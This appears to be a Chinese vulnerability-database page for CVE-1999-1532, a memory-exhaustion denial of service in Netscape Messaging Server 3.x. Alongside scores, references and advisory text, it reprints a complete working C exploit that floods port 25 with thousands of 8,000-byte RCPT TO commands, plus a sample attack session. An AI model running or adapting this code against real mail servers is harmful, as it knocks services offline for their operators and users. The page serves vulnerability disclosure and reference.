CVE-1999-1532
CVSS5.0
发布时间 :1999-10-29 00:00:00
修订时间 :2016-10-17 22:05:34
NMCOES    

[原文]Netscape Messaging Server 3.54, 3.55, and 3.6 allows a remote attacker to cause a denial of service (memory exhaustion) via a series of long RCPT TO commands.


[CNNVD]Netscape Messaging Server RCPT TO DoS漏洞(CNNVD-199910-054)

        Netscape Messaging Server 3.54、3.55及3.6版本存在DoS漏洞。远程攻击者通过一系列长的RCPT TO命令造成服务拒绝(内存耗尽)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:netscape:messaging_server:3.6Netscape Netscape Messaging Server 3.6
cpe:/a:netscape:messaging_server:3.55Netscape Netscape Messaging Server 3.55
cpe:/a:netscape:messaging_server:3.54Netscape Netscape Messaging Server 3.54

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1532
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1532
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199910-054
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=94117465014255&w=2
(UNKNOWN)  BUGTRAQ  19991029 message:Netscape Messaging Server RCPT TO vul.
http://www.securityfocus.com/bid/748
(VENDOR_ADVISORY)  BID  748

- 漏洞信息

Netscape Messaging Server RCPT TO DoS漏洞
中危 输入验证
1999-10-29 00:00:00 2006-10-06 00:00:00
远程※本地  
        Netscape Messaging Server 3.54、3.55及3.6版本存在DoS漏洞。远程攻击者通过一系列长的RCPT TO命令造成服务拒绝(内存耗尽)。

- 公告与补丁

        Netscape has stated a release date of December 1999 for Messaging Server 4.15, which will not include this vulnerability.
        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19571)

Netscape Messaging Server 3.6/3.54/3.55 RCPT TO DoS Vulnerability (EDBID:19571)
multiple dos
1999-10-28 Verified
0 Nobuo Miwa
N/A [点击下载]
source: http://www.securityfocus.com/bid/748/info

Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. 

/***************************************************************
 You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
 whether vulnerable for too much RCPT TO or not. 
                  by Nobuo Miwa, LAC Japan  28th Oct. 1999 
                  http://www.lac.co.jp/security/ 
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define    STR_HELO      "HELO rcpt2\n"
#define    STR_MAILFROM  "MAIL FROM:rcpt2\n"
#define    RCPT2_LENGTH  8000
#define    RCPT2_NUMBER  10000

int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
    int             port=25, sd, rt ;
    long            li ;
    struct hostent  *he;

    si->sin_addr.s_addr = inet_addr(hostIPaddr);
    si->sin_family      = AF_INET;
    si->sin_port        = htons (port);
    sd = socket (si->sin_family, SOCK_STREAM, 0);
    if (sd == -1) return (-1);

    rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
    if ( rt < 0 ) {
       close(sd);
       return(-1);
    }

    return(sd) ;
}

void sendRCPT2(int sd)
{
    char    rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
    int     rt, i;

    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    recv( sd, tmpStr, sizeof(tmpStr), 0 );
    printf("%s",tmpStr);  

    printf("%s",STR_HELO);
    send( sd, STR_HELO, strlen(STR_HELO), 0 );
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
    if ( rt>0 ) printf("%s",tmpStr);

    printf("%s",STR_MAILFROM);
    send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
    if ( rt>0 ) printf("%s",tmpStr);

    strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
    while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
        strcat( rcptStr, "aaaaaaaaaa") ;
    strcat( rcptStr, "\n" );
    for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
        printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,strlen(rcptStr));
        send( sd, rcptStr, strlen(rcptStr), 0 );
        rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
        strncpy( strn, tmpStr, 60 ) ;
        if ( rt>0 ) printf("%s \n",strn);
    }

    return;
}

int main (int argc, char *argv[])
{
    char                 hostIPaddr[80], *cc, *pfft;
    int                  sd = 0;
    struct sockaddr_in   si;

    printf("You can use ONLY for YOUR Messaging Server 3.6\n");
    if (argc != 2) {
        printf("Usage: %s IPaddress \n",argv[0]);
        exit(1);
    } else
        strcpy (hostIPaddr, argv[1]);

    sd = openSocket(&si,hostIPaddr);  

    if (sd < 1) {
        printf("failed!\n");
        exit(-1);
    }

    sendRCPT2( sd );
    close (sd);

    exit(0);
}











































































		

- 漏洞信息

13555
Netscape Messaging Server RCPT TO Command Saturation DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

1999-10-29 Unknow
1999-10-29 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Netscape Messaging Server RCPT TO DoS Vulnerability
Input Validation Error 748
Yes Yes
1999-10-29 12:00:00 2009-07-11 12:56:00
Posted to Bugtraq October 29 by Nobuo Miwa <n-miwa@lac.co.jp>.

- 受影响的程序版本

Netscape Messaging Server 3.55
Netscape Messaging Server 3.54
Netscape Messaging Server 3.6

- 漏洞讨论

Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service.

- 漏洞利用

Example and exploit by Nobuo Miwa &lt;n-miwa@lac.co.jp&gt;

220 victim.workgroup ESMTP server (Netscape Messaging Server -
Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender &lt;rcpt2&gt; Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient &lt;rcpt2@aaaaaaaaaaaa....
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient &lt;rcpt2@aaaaaaaaaaaa....

Repeat until DoS

- 解决方案

Netscape has stated a release date of December 1999 for Messaging Server 4.15, which will not include this vulnerability.

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站